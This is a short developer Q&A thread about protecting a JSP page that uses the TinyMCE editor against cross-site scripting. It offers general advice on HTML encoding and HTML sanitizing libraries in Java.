TinyMce protection against cross site scripting

Question

We are planning to use TinyMce in a JSP.

We have a standard security filter which keeps track of input data from forms. It identifies insecure code input attempting any intrusions/cross site scripting.

My questions are as follows:

• When using tinyMce are there any third party libraries (paid or open source) which would help scan and identify for any insecure code attempting cross site scripting?

(I found one link in StackOverflow mentioning a PHP library, but I was looking for something in Java.)

• If we do not have any way to secure Tinymce, then what is the general design consideration that has to be taken to make it as secure as possible?

Answer 1

SQL injection should be something you worry about in your data layer, rather than your front-end. If you're using the proper techniques to prevent SQL injection when you insert the data into your database, you shouldn't have to worry about doing anything with TinyMCE, or any other part of your front-end code.

Cross-site scripting attacks, on the other hand, are a different story. The best strategy for preventing cross-site scripting attacks is generally to HTML-Encode everything that you don't produce in your front-end layer. However, since you're using TinyMCE, I'm guessing that you want to allow user-generated HTML to appear on your site. In that case, you'll want to look up "HTML Sanitizing."

Here are a couple of links to start you off:

• Libs for HTML sanitizing
• How to sanitize HTML code in Java to prevent XSS attacks?

You can decide whether you prefer to sanitize the HTML before saving it to the database, after retrieving it from the database, or both. There are pros and cons to each strategy.